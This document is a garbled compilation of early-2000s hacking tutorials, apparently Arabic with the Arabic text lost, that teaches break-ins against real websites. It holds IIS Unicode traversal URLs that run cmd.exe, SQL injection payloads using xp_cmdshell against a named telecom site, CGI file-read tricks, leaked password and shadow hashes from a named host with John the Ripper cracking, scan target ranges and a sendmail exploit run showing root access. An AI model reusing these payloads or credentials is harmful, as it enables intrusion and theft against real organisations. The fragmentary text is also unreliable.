/http://www.com.il/cgi-bin cgi-
/bin/w3-msql
WWWMSQL
cgi-bin/w3-msql
WWWMSQL
w3-msql Exploit w3-msql
http://www.securiteam.com/exploits/2WUQBRFS3A.html
Random Hacking
w3-msql
/vti_pvt_/
HTML *html.
The page cannot be displayed..
Forbddien .... not found....
.. .....
url c
perl Shell *.sh Batch
perl exploit.pl exploit
(:
(:
> perl
exploit.pl > log.htm
Exploit
) ( RedHat 6.2
.
173
" "
><
>< marwan911 :
.
:IIS ) . (
:apache .
http://www.netcraft.net
whitehouse.org
: //:http /
http://uptime.netcraft.com/up/graph....whitehouse.org
The site www.whitehouse.org is running Microsoft-IIS/5.0 on Windows
2000
IIS5.0
2000
174
IIS5.0 ) (
) 2000 (
IIS .
.
.
www.arank.com
)The site www.arank.com is running Apache/1.3.20 (Unix
mod_gzip/1.3.19.1a mod_perl/1.26 mod_bwlimited/0.8 PHP/4.0.6
mod_log_bytes/0.3 FrontPage/5.0.2.2510 mod_ssl/2.8.4 OpenSSL/0.9.6
on Linux
apache 1.3.20 FrontPage/5.0.2.2510
Linux
.
_ vti_pvt _ private
175
176
" "
> <
>:
.
( -1
( - ) IIS (
( - ) apachc (
( -2
( -3
( -4
IIS
.
apachc
.
.
177
: , : spiders
, ,
, walla.co.il : ,
;( .
:10 , , !!
:10 , $:
, , ,(: (: (: service.pwd :
:11 , , (:
:11 , EXPLOITES
, , (: , EXPLOITES
. /http://www.ussrback.com :
179
1.
2 .
3 .
4 .
.
..
http://mypage.ayna.com/vox99/cgiscan3.zip
180
"
"
> <
> :<
:::
,,,
,,
...
181
::
27374 . 1243
**
.
------------
+
........ ,,,,
182
...
http://mypage.ayna.com/a7lla1/superscan.zip
<--------212.150.32.255---------------212.150.13.1
<----------62.0.180.255-----------------62.0.150.1
<--------199.203.72.255---------------199.203.75.1
<--------139.92.208.255---------------139.92.208.1
<--------192.114.42.255---------------192.114.42.1
<---------216.72.43.255----------------216.72.43.1
<-------212.143.113.255--------------212.143.113.1
<--------209.88.198.255---------------209.88.198.1
<--------212.29.238.255---------------212.29.238.1
<-------193.128.102.255--------------193.128.102.1
<-------192.117.236.255--------------192.117.236.1
<---------213.8.204.255----------------213.8.204.1
<--------212.25.120.255---------------212.25.120.1
<---------128.139.1.255----------------128.139.1.1
<------------212.2.227.255<-------------212.2.224.1
<-----------212.26.255.225<--------------212.26.1.1
<-----------213.238.20.255<-------------213.238.0.1
<------------212.102.3.255<-------------212.102.1.1
<----------212.116.195.255<-----------212.116.190.1
<-----------212.106.70.255<------------212.106.60.1
<-----------195.229.31.255<-------------195.229.6.1
<----------195.229.255.255<-----------195.229.224.1
<-----------194.170.30.255<------------194.170.30.1
<-----------213.42.255.255<--------------213.42.1.1
<-------------208.7.80.255<--------------208.7.70.1
<----------195.226.255.255<-----------195.226.240.1
<-----------195.39.145.255<------------195.39.130.1
<----------168.187.255.255<-------------168.187.1.1
<-----------194.133.255.25<-------------194.133.1.1
<------------209.58.40.255<-------------209.58.40.1
<-----------206.82.133.255<------------206.82.133.1
<-----------206.49.109.255<------------206.49.109.1
<-------------212.72.7.255<--------------212.72.1.1
<----------193.188.200.255<------------193.188.50.1
183
184
+++++++++++
[] ][1
[] ][2
========================================
*****& &*****
=)
Start
ShadowScanSecurity
(=
-1-
Scanner
-2-
185
=1 4 )
(
=2
=3 4
=4
=5
=6
=7
-3-
186
) (1 -2-
) (2
) (3
-4-
+1+
+2+
+ 3+
+4+
+ 5+ :-3-
+ 6+
+ 7+
-5-
Done
187
-6-
Start Scan
1 -5-
" "
> <
> : <
etc/shadow/
188
etc/shadow/
BSD
etc/master.passwd/
SGI ARIX
etc/shadow/
AIX
etc/security/shadow/
)) )) - )) 64 64
(( (( ((
etc/shadow/
)) MD5 ((
)) (( NT - XP - 2000
)) (( LanMan
winnt/system32/config/sam/
))
((
)) ((
_.winnt/repair/sam or sam/
)) - ((
WINNT
.Windows
" ) ( "
> <
189
:
..
..
..
Telnet ..
Telnet
Port )( )
(Daemon .
: )( )(
)( .. ) (Telnet
) (Daemon ..
.. ) ( ) ( .
Telnet ) ( ..
.
Daemon .
Telnet FTP Client
FileTransfer Protocol
.. 21
Telnet FTP Client
!! FTP
..
-1 Telnet ftp.zdnet.com 21
- Sources Code
.l19-sj-zdnet.zdnet.com NcFTPd Server (licensed copy) ready 220
- Sources Code
190
user anonymous
- Sources Code
.Guest login ok, send your complete e-mail address as password 331
- Sources Code
pass @zorro
Anonymous
.. ) ) @
- Sources Code
.You are user #552 of 2000 simultaneous users allowed-230
-230
.Logged in anonymously 230
.. ..
.
)
( .. !!
.
: )( IP
.
..
.
: PASV
191
- Sources Code
PASV
IP ) ( )(
..
- Sources Code
(Entering Passive Mode (207,189,69,61,12,41 227
..
) ( IP .. 207,189,69,61
3113 = 41 + 256 12
.. 3113
Telnet ftp.zdnet.com
.. 3113
..
( LIST (
- Sources Code
LIST
- Sources Code
.Data connection already open; Transfer starting 125
192
.
.. PASV .
..
) ( .
.. CuteFTP!!
http://www.vbip.com/winsock/winsock_ftp_01.asp
) (
) http://www.vbip.com/winsock/winsock_ftp_ref_01.htm (
) http://www.cis.ohio-state.edu/htbin/rfc/rfc0959.html
(.
" ) ( "
> <
> :<
193
:
~~~~~~~~~
. password file password file ) (encryption ) (shadowed -
-:
~~~~~~~~~
!
) ( Void Eye
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
nmap
www.inscure.org/nmap
SuperScan
Perl Perl
C
( /http://www.7lem.com
ping (
) (587 - 514 - 513 - 143 - 110 - 37 - 25 - 23 - 22 - 21
...
23 /http://www.7lem.com
/telnet http://www.7lem.com
194
195
http://www.psyon.org/tools/index.html
whois
http://www.google.com/search?q=whois&btnG=Google+Search
~~~~~~~~~~~~~~~~~~~~~~~~~~
void eye ShadowSecurityScaner !!
Apache IIS CGI Perl PHP
..
counter
mp3 Don't Tell Me
25 23 21 110
Ikonboard v2.1.8b
Ikonboard v2.1.8b Ikonboard v2.1.7b
cgi pl
% 80 cgi
etc/passwd
FreeBSD
shadow master.passwd ..
...
++++++++++++++++++++++++
} { http://www.fbunet.de/cgibin/nph-%20%20%20%20%20.cgi CGI
....
196
: timduff.com
i'm from saudi arabia
/../../../../../../../../../../../../../../../../../
/../ !
-:
-1
-2
.....
-3 ) ( Perl - Cgi
-4 %100
) (
-5 )
(
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/http://www.timduff.com
) (
)( sh
shell * sh.
shell
)(bat
197
)( C
gcc
gcc Exploit.c -o Exploit
) * c. * C. c
++ )* (h.
(
Perl
)
(
....
= Exploit
password file~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-----------------------------------------------------------------------------------------------root:x:0:1:Super-User:/:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin:
sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer
Admin:/usr/spool/lp: smtp:x:0:0:Mail Daemon User:/: uucp:x:5:5:uucp
Admin:/usr/lib/uucp: nuucp:x:9:9:uucp
Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico listen:x:37:4:Network
Admin:/usr/net/nls: nobody:x:60001:60001:Nobody:/:
noaccess:x:60002:60002:No Access User:/:
nobody4:x:65534:65534:SunOS 4.x Nobody:/:
www:x:102:1001::/web:/bin/csh
mirrors:x:102:1001::/web/mirrors:/web/mirrors/menu
sid:x:103:10::/export/home/sid:/bin/ksh
mirror:x:104:1::/home/mirror:/bin/sh admin:x:105:1::/home/admin:/bin/sh
jerome:x:106:1::/home/jerome:/bin/sh erl:x:102:1::/home/erl:/bin/sh
198
landmark:x:1000:1000::/web/landmark:/bin/ksh
-----------------------------------------------------------------------------------------------
10
......
~~~~~~~~~~~~~~~~~~~~~~~~~~
!...
* = x Shadowed
= EpGw4GekZ1B9U DES
FreeBSD 13
password file~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~
Ctrl + Shift
... hwwilson.com
-:
root:x:0:1:Super-User:/:/sbin/sh
root
root
199
x
x
0
1
Super-User:/:/sbin/sh
++++++++++++++++++++++++++++
) (encryption ) (shadowed~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~
shadow file * x # !
root:x:0:1:Super-User:/:/sbin/sh
root:Q71KBZlvYSnVw:0:1:Super-User:/:/sbin/sh
Q71KBZlvYSnVw
....
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~
Crack 5.0a john the ripper jack the ripper
Crack 5a john the
ripper john the ripper .....
-:
wordlist .
200
\ -----------------------------------------------------------------------------------------------------> Q2wrtUo9LPq2R
| } ---> //{ | /---/ | / 1 / wordlist
| _____________ / 0 / | }{ | | / 1 / |----\ / 0 / ---------^--------
| word list -> Q6LiJ6ct1oUBz /---/ | |
_____________| \ ------song--------// ------------------
..
| | ------------------------------------------------------------------------------- -:
}{ | 5000 ) john the ripper (700
| -------------------------------------------------------------------------------
-----------------------------------------------------------------------------------------------
john the ripper
john -w:wordlist passwd
wordlist
passwd
-----------------------------------------------------------------------------------------------Microsoft(R) Windows 98
).C)Copyright Microsoft Corp 1981-1998
E:\Desktop\junk\john the ripper>john -w asswd passwd.txt
by Sola 97,John the Ripper Version 1.3 Copyright (c) 1996
Loaded 1 password
**v: 0 c: 6401 t: 0:00:00:01 99% c/s: 6401 w: *****DONE
<E:\Desktop\junk\john the ripper
----------------------------------------------------------------------------------------------- john.pot
...
brute force
wordlist 3
.. wordlist
5000 wordlist brute
force
john the ripper brute force
john -i passwd
201
passwd
...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~
Unshadow !!
) ( shadow file
:
* = Linux : /etc/shadow token
= SunOS : /etc/shadow token *
* = FreeBSD : /etc/master.passwd or /etc/shadow token x
IRIX : /etc/shadow token = x
! = AIX : /etc/security/passwd token
* = ConvexOS : /etc/shadow or /etc/shadpw token
token passwd
! etc/security/passwd/
)
(
shadow
-----------------------------------------------------------------------------------------------::::::root:EpGw4GekZ1B9U:11390:::::: bin:NP:6445:::::: sys:NP:6445
adm:IyEDQ6VoRlLHM:10935:::::: #admin:9z8VMm6Ovcvsc:10935::::::
::::::lp:NP:6445
-----------------------------------------------------------------------------------------------
passwd file shadow passwd
...
http://wilsonweb2.hwwilson.com/etc/passwd
-----------------------------------------------------------------------------------------------root:x:0:1:Super-User:/:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin:
sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer
Admin:/usr/spool/lp: smtp:x:0:0:Mail Daemon User:/: uucp:x:5:5:uucp
Admin:/usr/lib/uucp: nuucp:x:9:9:uucp
Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico listen:x:37:4:Network
202
Admin:/usr/net/nls: nobody:x:60001:60001:Nobody:/:
noaccess:x:60002:60002:No Access User:/:
:/:nobody4:x:65534:65534:SunOS 4.x Nobody
www:x:102:1001::/web:/bin/csh
mirrors:x:102:1001::/web/mirrors:/web/mirrors/menu
sid:x:103:10::/export/home/sid:/bin/ksh
mirror:x:104:1::/home/mirror:/bin/sh admin:x:105:1::/home/admin:/bin/sh
jerome:x:106:1::/home/jerome:/bin/sh erl:x:102:1::/home/erl:/bin/sh
landmark:x:1000:1000::/web/landmark:/bin/ksh
----------------------------------------------------------------------------------------------- x token
etc/shadow/
http://wilsonweb2.hwwilson.com/etc/shadow
-----------------------------------------------------------------------------------------------root:XOT4AiUKMRcKQ:10643:::::: daemon:NP:6445:::::: bin:NP:6445::::::
sys:NP:6445:::::: adm:NP:6445:::::: lp:NP:6445:::::: smtp:NP:6445::::::
uucp:NP:6445:::::: nuucp:NP:6445:::::: listen:*LK*:::::::
nobody:NP:6445:::::: noaccess:NP:6445:::::: nobody4:NP:6445::::::
www:WJctaI.8rcSe2:10507:::::: mirrors:gg9p.5kwGw1MY:10911::::::
sid:stXldZKnujFYo:10515:::::: mirror:iMPWwbrU.gB4k:10601::::::
admin:hDhB5YYKyWgQw:10976:::::: jerome:XDqnOl32tPoGo:10976::::::
::::::erl:0jE9Xem4aJYeI:10982:::::: landmark:0jCgWu6vl8g0s:11185
----------------------------------------------------------------------------------------------- x
-:
...
-:
www.securiteam.com/exploits/archive.html
/http://www.ussrback.com
+
/http://www.secureroot.com
203
/http://www.rootshell.com
/http://www.ussrback.com
www.secureroot.com/category/exploits
www.hitboss.com/Hacking
www.undergroundnews.com/resources/s...ound/search.asp
Warez.com-Underground
/http://www.warez.com
Hacking
((
/http://www.neworder.box.sk
Security Search Engine
/http://www.bugs2k.com
insecure
/http://www.insecure.org
<XMP></BODY></HTML/>
http://public.www.easynet.co.uk/cgi...ail/formmail.pl
" (" )
204
> <
...
..
.....
....
* ) (host
* ) (passwd
/etc/passwd
shadow passwd
nt admin.pwd
*
cgi-bin cgi
php.cgi
/http://www.jewish.org
/http://www.jewish.org /cgi-bin php.cgi
http://www.jewish.org/cgi-bin/php.cgi
scripts
http://www.jewish.org/scripts/php.cgi
scripts winnt
cgi-bin
" )( "
206
><
>< ICER :
: ...
)(
...
(:
nslookup, host, dig, ping, traceroute,telnet, ssh, ftp
gcc )... (
nmap and netcat .
* :
-1 ..
.
-2 nmap
-3 NetCat
-4
...
....
* :
(a) Linux (http://www.slackware.com
(b) Nmap (http://www.insecure.org
(/c) NetCat (http://www.l0pht.com/~weld/netcat
-:
-1 ) ( P:
-2 nmap :
*tar zxvf nmap.tar.gz (1
cd nmap (2
configure && make && make install/. (3
-3 ..
www.target.com
-4
nslookup www.target.com
196.1.2.3
-5 -:
""nmap -sS -O 196.1.2.3
-:
root@IcEr:~# nmap -sS -O 196.1.2.3
( /Starting nmap V. 2.54BETA22 ( www.insecure.org/nmap
:(Interesting ports on www.target.com (196.1.2.3
)(The 1531 ports scanned but not shown below are in state: closed
207
(:
...
FTP ..
daemon
-: FTP daemon
"telnet 196.1.2.3 21"
"ftp 196.1.2.3"
:
root@IcEr:~# ftp 196.1.2.3
.Connected to 196.1.2.3
www.target.com FTP server (Version wu-2.6.0(1) Mon Mar 6 13:54:16 220
(SAST 2000
.ready
Name (target:root): anonymous
.Guest login ok, send your complete e-mail address as password 331
:Password
Welcome, archive user! This is an experimental FTP server. If have-230
any
unusual problems, please report them via e-mail to-230
root@IcEr.pandora.net
If you do have problems, please try using a dash (-) as the first-230
character
of your password -- this will turn off the continuation messages that-230
may
.be confusing your ftp client-230
-230
208
209
..
..
..
..
.. .
210
><
>< BSD-r00t :
|
| *
|
| * htaccess.
|
| * htaccess.
|
| * error
| * | index
|
| * /
|
| *
|
| * .htpasswd
|
| * htaccess.
|
| * htaccess.
|
| *
|
| *
-------------------------------------------------*
----------- ,
.. htaccess. .
* htaccess.
---------------------- -1
-2 error
-3 index
-4/
-5 .. html , .asp.
-6
* htaccess.
-------------------------- " "Notepad
htacces. txt. ,
" - "htaccess. . -
* error
-----------------------
211
.
error -:
- error
-
- htaccess.
ErrorDocument error_num
directory_file
error_num " " directory_file
error
.
ErrorDocument 404
:
/errors/nfound.html
errors - :
----------------------| | Bad Syntax | 400
----------------------| | Unauthorized | 401
----------------------|
| Not Used | 402
----------------------| | Forbidden | 403
----------------------| | Not Found | 404
----------------------* index
---------------------------------------------- index
-:
- index " "
- htaccess. -:
Options -Indexes
* /
------------------------------------ htaccess.
..
- :
???deny from ???.???.???.
... .
-:
deny from all
-:
... allow from
212
...
*
------------------------------------ Redirection htaccess.
htaccess.
-:
???Redirect /somewhere/???.???/???.
http://www.site.com/newlocation
???.???/somewhere/
???.???/http://www.site.com/newlocation
.
---------* .htpasswd
----------------------- , htaccess. .
htaccess
htpasswd -:
user1:EncryptedPwd1
user2:EncryptedPwd2
o user1 , user2 .
o EncryptedPwd1 , EncryptedPwd2
http://www.euronet.nl/~arnow/htpasswd
http://www.e2.unet.com/htaccess/make.htm
Security fu93hds3
http://www.euronet.nl/~arnow/htpasswd
o username : Security
o passwrod & re-enter password : fu93hds3
o claculate Security:893bNicBcwszw <--
htaccess. .
htaccess
.
* htaccess.
---------------------------
, .
htaccess.
.
213
--:
AuthUserFile /somewhere/.htpasswd
"AuthName "Enter your user and passed
please
Require valid-user
AuthType Basic
><Limit GET POST
require valid-user
><Limit/
o /somewhere/.htpasswd htpasswd.
o Enter your user and passed please
* htaccess.
---------------------------- ,
..
- :
><Files .htaccess
order allow,deny
deny from all
><Files/
. error 403
*
------------------------------ html. txt. .
-:
AddType text/plain html
-:
http://www.pharaonics.net/books/MIME.txt
214
> <
> :<
FTP
FTP File Transfer Protocol
TCP/IP
FTP
Formats
,FTP .
:
:
:Download
Host .Local
:Uplaod
Local .Host
:
:Secure FTP
.
:Anonymous FTP
guest anonymous
.
:
:Public Domain
.
:Freeware
.
:Shareware
215
FTP :
:ASCII
) (American Standard Code for Information Interchange
bits .127
.
.
:Binary
bits 255
.
ASCII & jpg & gif
bmp avi - ram - mpg - mp3 -
wav
exe - com - bat - dll - drv - sys - bin - ovl - zip - mim - uue - xxe - :
b64 - bhx MS Office
.
: FTP
:
UNIX
:UNIX
:ascii ASCII
.
:binary
.
:status ASCII .Binary
:help .UNIX
216
:dir
:ls .
:cd directory .
:get filename .
:mget filename .
:pwd .
:bye .
:Shell
Tripod Unix Shell ftp ftp :
ftp.tripod.com " "IronPrivate
"******" . Unix.
Unix
:
http://www.pc-worlds.net/lunexx.html
.
:Browser
URL
ftp:// http:// FTP
.
:SLIP/PPP
.Client Programs
Windows .Ws_ftp
:Ws_ftp LE 5.06
Session
Profile Profile Name
My Home Page In Tripod Host Name
ftp.tripod.com Host Type Auto Detect
User ID
217
... .
.
:Telnet
Telnet
. .
Windows
"" .
" "FTP
218
> <
>< hacker dz :
FTP
21
FTP
Superscanne
Start
Run
ftp n
<FTP
Open
Enter
<FTP
To
To
Connected to www.assassin.com
.(websrv1 Microsoft FTP Service (Version 4.0 220
ftp>quote user ftp
Anonymous acces allowed, send identify (e-mail name) as 331
.password
ftp>quote cwd ~root
Please login with USER and PASS 530
ftp>quote pass ftp
219
.Anonymous user logged in 230
20
Pwd
Cd
Cd black
Ls
Get
Get black.exe
Put
Get
Put black.exe
Clos
:Codes:
Signification
.Restart marker reply
110
(Service ready in nnn minutes. (nnn est un temps
120
.Data connection already open; transfer starting
125
.File status okay; about to open data connection
150
.Command okay
200
.Command not implemented, superfluous at this site
202
.System status, or system help reply
211
.Directory status
212
220
.File status
.Help message
.NAME system type
.Service ready for new user
.Service closing control connection
.Data connection open; no transfer in progress
.Closing data connection
.(Entering passive mode (h1, h2, h3, h4, p1, p2
.User logged in, proceed
.Requested file action okay, completed
.PATHNAME" created"
.User name okay, need password
.Need account for login
.Requested file action pendingfurther information
.Service not available, closing control connection
.Can't open data connection
.Connection closed; transfer aborded
Requested file action not taken. (Fichier dj utilis par autre
213
214
215
220
221
225
226
227
230
250
257
331
332
350
421
425
426
450
(chose
.Requested action aborded: local error processing
451
Requested action not taken. (Pas assez de mmoire pour
452
(excuter l'action
.Syntax error, command unrecognized
500
.Syntax error in parameters or arguments
501
.Command not implemented
502
.Bad sequence of commands
503
.Command not implemented for that parameter
504
.Not logged in
530
.Need account for storing files
532
Requested action not taken. (Fichier non trouv, pas d'accs
550
(...,possible
.Requested action aborded: page type unknown
551
.Requested file action aborded
552
(Requested action not taken. (Nom de fichier non attribu
553
221
> <
>< linuxray :
: ) ( SQL
ASP
SQL ASP SQL
SQL
1433
SQL
SQL .
: SQL
PHP ASP
_LinuxRay
- - -
. Administrator
...
: SQL
User Name Passwd
:
User name and Passwd ASP
* sql.
htr.+
:
http://target/page.asp+.htr
: target
: Page asp
: htr.+
....
View Source ASP
:
222
>%
("Set DB= Server.CreateObject("ADODB.Connection
DB.Open "DRIVER=SQL
Server;SERVER=xxx;UID=sa;PWD=;APP=Microsoft (R) Developer
"Studio;WSID=xxx;DATABASE=moe_dbs", "_LinuxRay", "6666666
<%
---------------------------------------------------------------- _LinuxRay
6666666
-----------------------------------------------------------------
ASP :
'AMicrosoft VBScript runtime error '800a01a8
'Object required: 'Conn
filename.inc, line 5/
* inc.
.
ASP
database.inc
>!<--"include file = "database.inc#--
global.asa
global.asa++
beforemilion-global.asa
global.asamilion.sql
global-direct.asa
SQL
:
global.asa+.htr
223
New
(Project (Exiting Data
.
Create
Data Link Properties
- -
- 1 Select or enter server name
- 2 User Name
- 3 Password
) (Blank Password
Test Connection
Test Connection Succeeded
.
:
Select the data base on the server
OK .
>< hish_hish :
(:
,
PHP ASP
.
SQL Server , MySQL,Oracle
SQL
(: ((((:
SQL
SQL
SQL injection
/http://www.stc.com.sa
http://www.stc.com.sa/arabic/scripts/ar_frame.asp?pagenum=25
!!!!
SQL injection
' :
' :
:
225
SQL
inject SQL Query
.
SQL injection
:code
admin :
t0ps3cr3t :
SQL :
:code
User admin
t0ps3cr3t
TRUE .
FALSE
: . SQL
> <field from web form
' SQL
:
:code
226
!!
blah' OR '1'='1 :
.
SQL
:code
SELECT * from Users
Users
'WHERE User_Name='blah' OR '1'='1' AND Password='blah' OR '1'='1
''blah' OR '1'='1
OR
''blah
TRUE
''1'='1
1 1 !!!!
TRUE OR TRUE
TRUE
: TRUE TRUE
TRUE TRUE SQL injection
Users
.....
SQL WHERE
(two dashes) -- ,
--'blah' OR '1'='1 :
) --
SQL
having clause
'having 1=1--
'Microsoft OLE DB Provider for ODBC Drivers error '80040e14
227
username
password ,username,id,userid,email
first_name,
userid
:
228
cs_isp_user
passwd
--(blah' group by (passwd :
:
:
UserID userid
MS SQL Server (:
UserID passwd
(:
blah' INSERT INTO :
cs_isp_user(UserID,passwd
( --('VALUES('M_3','hi
M_3 hi
) ( inject
id ) (
user
id
username ) ( admin1
passwd
union )
(
blah' union SELECT username FROM user :
:
229
id
blah' union SELECT username,username FROM user
blah' union SELECT username,username,usernam
e,username,username FROM user
:
( :
)SQL
(int )( Lame_Admin
Lame_Admin ,
(: microsoft ( :
blah' union SELECT passwd,passwd,passwd,pass:
wd,passwd FROM user
:
230
''80040e07
]Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the
.varchar value 'stupid' to a column of data type int
admin/admin.asp, line 13/
Stored Procedure
Built-in
Stored Procedure SQL Server sa
SQL Server
SQL Server
Stored Procedure 100
---------------------------+
+------------------------------------------------------------------------------+
| |----------xp_cmdshell )
(|-------
| |-----------xp_regread
|--------------------------------------------
| |----xp_regdeletekey
|-------------------------------------------------
| |-xp_regdeletevalue
|--------------------------------------------
| |---------- xp_regwrite
|-------------------------------------------------------
| |--xp_servicecontrol
|--------------------------------------------
----------------------------+
+-----------------------------------------------------------------------------+
Procedure
'exec master..xp_cmdshell 'dir
xp_cmdshell
'exec master..xp_regwrite 'REGISTERY KEY' VALUE
231
asp
asp
))CREAT TABLE M_3 ( source varchar(8000
M_3 varchar 8000
'bulk insert M_3 from 'c:\InetPub\wwwroot\login
asp.
union .
" "
> <
>< CONIK :
-:
-:1
-:
232
user administrator
) (
-:2
-: %99 C
.
shell
PHP Shell PHP .
Kernel 2.2.x
) C (
perl
linux Redhat 7.3
233
-:3
-:
file.pl/.
----Access Denied
-----chmod +x Conik.pl
Conik.pl/. $
-:4 C
-:
<------ gcc -o Conik Conik.c
-:
gcc -o Conik conik.c
Conik.c/.
gcc -o sendmail sendmail.c $
sendemail/. $
<Usage : sendmail <host> <OS> <user> <password
<----- sendmail smtp.israel.com RedHat-7.3 anonymous anonymous /. $
234
israel
...connecting to host
...connected
id
(uid=0(root) gid=0(root
Sendemail
Root Exan nofer
XXX. SENDMAIL
(-:
-:5
-:
-:6 Conik C Perl
PHP - CGI - UNICODE - VB - etc
-:7 UNICODE
-: UNICODE IIS Microsoft
-: UONICODE
vti_bin/.._/
%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../wi
\:nnt/system32/cmd.exe?/c+dir+c
Rpc/../
%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir
\:+c
samples/..%255c..%255c..%255c..%255c..%255c../
\:%255cwinnt/system32/cmd.exe?/c+dir+c
235
adsamples/..%255c..%255c..%255c..%255c..%255c../
\:%255cwinnt/system32/cmd.exe?/c+dir+c
\:scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c /
msadc/..%c0%af../..%c0%af../../
\:%c0%af../winnt/system32/cmd.exe?/c+dir+c
cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af../
\:%c0%af../winnt/system32/cmd.exe?/c+dir+c
UONICODE
CGI
cgi-bin/view-source?../../../../../../../etc/passwd /
cgi-bin/phf/
cgi-bin/wwwboard.pl/
cgi-bin/AT-admin.cgi/
cgi-bin/info2www/
cgi-bin/environ.cgi/
236
" "
> <
><Black_sNiper :
...
..
.:
who
rwho
finger
237
.:
username : Black
password : Black2
test demo
.:
etc/passwd/
etc/group/
etc/hosts/
usr/adm/sulog/
usr/adm/loginlog/
usr/adm/errlog/
usr/adm/culog/
usr/mail/
usr/lib/cron/crontabs /
etc/shadow/
.: bin
)( )( !!
.:
$ ed passwd
exec login !!
!!
.:
)( ..
.:
$ pwd
.:
$ /usr/admin
..
.. :
$ /usr/Black
!!
.:
$ ls /usr/Black
.:
mail
pers
games
bin
profile.
.:
$ cd
238
$ ls -a
:
:
profile.
$
.:
$ cat letter
letter
.:
$ passwd
!! ..
.:
$ grep phone Black
.:
$ cp letter letters
.:
$ write
.:
$ who
safadM tty1 april 19 2:30
paul tty2 april 19 2:19
gopher tty3 april 19 2:31
.. .:
$ cat /etc/passwd
:/:root:F943/sys34:0:1:0000
sysadm:k54doPerate:0:0:administration:usr/admin:/bin/rsh
checkfsys:Locked;:0:0:check file system:/usr/admin:/bin/rsh
.:
:Black:chips11,43:34:3:Mr doooom:/usr/Black
..
.:
$ ls /etc/group
root::0:root
adm::2:adm,root
:bluebox::70
239
!!
..
"
"
><
> : <
UNix Usage IN HackinG
.. up to date
(:
: pc , servers , supercomputers
BOX
..
... root , superuser
....
240
:
.. .. windows
..
.. ...
:
-1 ... nt .
9x
.. ..
..
-2 .. ..
...
.. :
-1 ). (
-2 open source
.. (:
BSD ..
...
..
.. ) SuSe
(
MDK
..
9 ) 7.2 (
.. .. ... .. .. ..
.. ... .. ..
.. ... .. (:
..
.. ... .. ..
..
.. ..
.. ..
internal .. winmodems
.. windows ..
(:
.. external real or true modems
... acorp , u.s. robotics
serial USB
...
.. isp (:
241
..
:
-1 ..
isp ...
-2 ...
-3 ... .. ..
(:
=====< ... ..
======< ======< ...
.. .
:
.. ..
-4 gov .mil. edu.
.
-5 .. .
REdirecting
: TCP ..
TCP\IP
....
... =D
..
.. ) (
<< service..
service daemon or server
.. ..
=D
..
FTPd
FTP
21
telnetd Telnet
23
(!sendmail (yes
SMTP
25
apache
HTTP
80
qpop
POP3
110
d ftp , telnet ..etc daemon
: www.host.net
TCP 80
GET /HTTP/1.1 /index.html ..
index.html
242
daemons ...
=<
daemons
... ..
... port scaners
..
... nmap fyodor
!!.. ..
=>
/http://members.lycos.co.uk/linuxdude/e3sar
.. nmap rpm
:
bash-2.03$ rpm -i nmap-2.53-1.i386.rpm
.. target.edu
..
:
bash-2.03$ nmap -sS target.edu
Starting nmap V. 2.53 by fyodor@insecure.org
( /( www.insecure.org/nmap
:(Interesting ports on target.edu (xx.xx.xx.xx
)The 1518 ports scanned but not shown below are in state:
(closed
Port
State
Service
tcp open
ftp/21
tcp open
telnet/23
tcp open
smtp/25
tcp open
http/80
tcp open
pop3/110
Nmap run completed -- 1 IP address (1 host up) scanned in 34
seconds
nmap !!
daemons target.edu
..
.. .. .. ..
.. ... TCP :
bash-2.03$ telnet target.edu 21
...Trying xx.xx.xx.xx
.Connected to target.edu
.'[^' Escape character is
.target.edu FTP server (SunOS 5.6) ready 220
243
quit
.Goodbye 221
Connection closed by foreign host
(:
SunOS 5.6 -1
sunOS standard -2
:
bash-2.03$ telnet target.edu 25
...Trying xx.xx.xx.xx
.Connected to target.edu
.'[^' Escape character is
target.edu ESMTP Sendmail 8.11.0/8.9.3; Sun, 24 Sep 2000 220
09:18:14 -0
(EDT) 400
quit
target.edu closing connection 2.0.0 221
.Connection closed by foreign host
sendmail smtp
8.11.0/8.9.3
..
.. daemon
:
nmap
bash-2.03$ nmap -sS target.edu
Starting nmap V. 2.53 by fyodor@insecure.org
( /( www.insecure.org/nmap
:(Interesting ports on target.edu (xx.xx.xx.xx
The 1518 ports scanned but not shown below are in state:)
(closed
Port
State
Service
tcp open
ftp/21
tcp open
telnet/23
tcp open
smtp/25
tcp open
http/80
tcp open
pop3/110
TCP Sequence Prediction: Class=random positive increments
(!Difficulty=937544 (Good luck
Remote operating system guess: Linux 2.1.122 - 2.2.14
Nmap run completed -- 1 IP address (1 host up) scanned in 34
seconds
244
|:
!!!!!!
!!!!!! sunOS =@
..
..
...
Ss- =D
:
bash-2.03$ man nmap
..
) (
:
bash-2.03$ ls
program.c
sh-2.03$ ftp shell.com
Connected to shell.com
.shell.com FTP server (SunOS 5.6) ready 220
Name: luser
.Password required for luser 331
:Password
.User luser logged in 230
ftp> put program.c
.PORT command successful 200
.(ASCII data connection for program.c (204.42.253.18,57982 150
.Transfer complete 226
ftp> quit
Goodbye 221
ftp
.
sh-2.03$ vi exploit.c
c.
.
sh-2.03$ gcc program.c -o program
sh-2.03$ ./program
: ..
. usage
-: .
..
245
http://www.linux.com.cn/hack.co.za
..
..
.. TARGET.EDU
sendmail 8.11.0
..
:
http://www.pharaonics.net/less/NEtworks/124.htm
. .. )
(
.. ....
..
..
